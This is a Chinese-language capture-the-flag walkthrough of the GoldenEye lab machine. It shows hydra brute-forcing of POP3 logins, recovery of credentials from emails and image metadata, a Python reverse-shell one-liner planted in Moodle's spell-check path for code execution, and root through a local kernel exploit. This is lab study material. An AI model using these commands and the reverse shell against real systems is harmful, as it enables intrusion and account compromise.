注:因记录时间不同,记录中1.111和1.105均为靶机地址。

1.1得到目标,相关界面如下:

 Goldeneye 靶机过关记录

1.2简单信息收集

wappalyzer插件显示:

  web服务器:Apache 2.4.7

  OSUbuntu

Nmap扫描端口:

  Open port 80/25/55006/55007

1.3查看web页面更多信息

页面显示添加/sev-home/访问,于是访问http://172.16.1.111/sev-home/如下

 Goldeneye 靶机过关记录

没有用用户名密码,且页面无更多信息,尝试查看源码

发现terminal.js文件

 Goldeneye 靶机过关记录 

点击查看

 Goldeneye 靶机过关记录

  

 js文件中涉及信息如下:

  人名:BorisNatalya

  编码:

    Goldeneye 靶机过关记录

html实体编码,解码后为InvincibleHack3r

 

尝试使用已知两个用户名和解码后的信息登陆,发现登陆失败。Boris小写后成功登陆 

Goldeneye 靶机过关记录

Goldeneye 靶机过关记录

 

登陆后的页面信息提示:

  “pop3服务配置为在一个非常高的非默认端口上运行”

结合最初nmap扫描的信息,可能为5500655007

识别端口:

  Nmap识别:Nmap -Pn -p your-port -sV your-IP,显示pop3端口为55007

  我是偶然加端口访问,看到相关端口信息

 Goldeneye 靶机过关记录

爆破POP3

利用已知用户名,使用工具进行爆破。这里使用hydra

root@kali:~# hydra -l natalya -P 6000dict.txt 172.16.1.105 -f -s 55007 pop3

 Goldeneye 靶机过关记录

root@kali:~# hydra -l boris -P 6000dict.txt 172.16.1.105 -f -s 55007 pop3

 Goldeneye 靶机过关记录

  PS:hydra用法:

  hydra -l muts -P pass.txt my.pop3.mail pop3

    -l 指定用户名

    -L 指定用户名字典

    -p 指定密码破解

    -P 指定密码字典

    -f 破解一个就停止

    -s 指定端口

截止目前,爆破得到的信息如下

  N:boris  P:secert1!

  N:natalya  P:bird

 

nc查看账户

boris账户登录:

 Goldeneye 靶机过关记录

 (不知道什么原因,其他人能正常登录,我的不行。好在账户的三封邮件信息无关)

 

 natalya账户登录:

 Goldeneye 靶机过关记录

查看第一封邮件

 Goldeneye 靶机过关记录

(好像没有有价值信息)

查看第二封邮件

 Goldeneye 靶机过关记录

从邮件进一步得到信息:

  username: xenia

  password: RCP90rulez!

  Domain: severnaya-station.com/gnocertdir

并指出需要host文件 severnaya-station.com in /etc/hosts.

 

按照套路,使用得到的用户名和密码登录邮箱,显示失败。转向web界面尝试。

 

修改本机host文件

Win10下位置(没有则新建):/windows/system32/drivers/etc

 修改内容:172.16.1.105   severnaya-station.com

 

访问severnaya-station.com/gnocertdir

 Goldeneye 靶机过关记录

登录

Goldeneye 靶机过关记录

 

到此,正式登录系统

2 漏洞发现

登陆系统,例行查看信息

Goldeneye 靶机过关记录

 发现cms类型,js库版本,编程语言等更多信息。

随处点击查看,发现 

Goldeneye 靶机过关记录

猜想CMSmoodle,版本为2.2.3

百度搜索该CMS漏洞,发现有rce漏洞。msf搜索,发现exp

 Goldeneye 靶机过关记录

在所有必要信息中,缺少用户名和密码。先放一放,继续查看

 

登录后,打开看到未读邮件,发现用户doak

 Goldeneye 靶机过关记录

 Goldeneye 靶机过关记录

 

 

 

继续使用工具对doak账户进行爆破

 Goldeneye 靶机过关记录

  

  USER doak

  PASS goat

 

登录doak邮箱,查看邮件

 Goldeneye 靶机过关记录

 

得到

  账号 dr_doak  

  密码 4England!  

(邮箱尝试,不存在该用户)网页登录,发现如下内容

 Goldeneye 靶机过关记录

 

 

点击文档下载查看

 Goldeneye 靶机过关记录

  

提到图片 /dir007key/for-007.jpg

查看http://severnaya-station.com/dir007key/for-007.jpg

Goldeneye 靶机过关记录

网上看Linux下使用strings工具多图片进行分析

 Goldeneye 靶机过关记录

不会用,没有找到有用信息

 

使用exiftool,查看

 Goldeneye 靶机过关记录

或者查看图片信息

 Goldeneye 靶机过关记录

 

发现信息:eFdpbnRlcjE5OTV4IQ==

使用小葵解密,为xWinter1995x!

 Goldeneye 靶机过关记录

 

继续查看,发现如下。猜测admin为管理员账户

 Goldeneye 靶机过关记录

 

 使用admin账户 xWinter1995x!密码登录

 Goldeneye 靶机过关记录

 

页面信息印证CMS版本猜想

Goldeneye 靶机过关记录

 

  

至此,得到使用该CMS漏洞exp的所有信息

3漏洞利用

使用Msfexp

 Goldeneye 靶机过关记录

  

Goldeneye 靶机过关记录

运行失败

 

shell方法2

百度搜索,找到另一种方法

1、在Home >Site administration >Server >System paths中添加反弹shell的代码

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("本机ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 Goldeneye 靶机过关记录

 

2、 Home >Site administration>Plugins > Text editors >TinyMCE HTML editor中将Spell engine改为PSpellShell

 Goldeneye 靶机过关记录

 

3、本地nc监听端口

Goldeneye 靶机过关记录

 

4Home> My profile >Blogs >Add a new entry随便填点东西,然后点击下图中红框的Toggle spellchecker,之后就获得shell

 Goldeneye 靶机过关记录

  获取shell之后要做的第一件事是使用Python获取一个tty

python -c 'import pty; pty.spawn("/bin/bash")'

Goldeneye 靶机过关记录

4 权限提升

查看当前服务器版本

Goldeneye 靶机过关记录

 

 

kali查找可用提权方式

Goldeneye 靶机过关记录

 

 

 

 

找到kali中的文件,放到本地

 Goldeneye 靶机过关记录

 Python开启服务

 Goldeneye 靶机过关记录

 

 nc中连接,将本机文件上传至靶机(这里改名为444.c

因靶机中未安装gcc,故用cc编译,需将文件中一处gcc换为cc

上传>编译>修改权限>执行

 Goldeneye 靶机过关记录

  到此,拿到root权限

相关文章:

  • 2021-06-22
  • 2022-12-23
  • 2022-02-07
  • 2022-02-28
  • 2022-12-23
  • 2021-05-12
  • 2021-08-13
  • 2021-07-28
猜你喜欢
  • 2022-02-09
  • 2021-05-24
  • 2022-12-23
  • 2021-05-23
  • 2021-10-13
  • 2022-02-03
  • 2021-08-25
相关资源
相似解决方案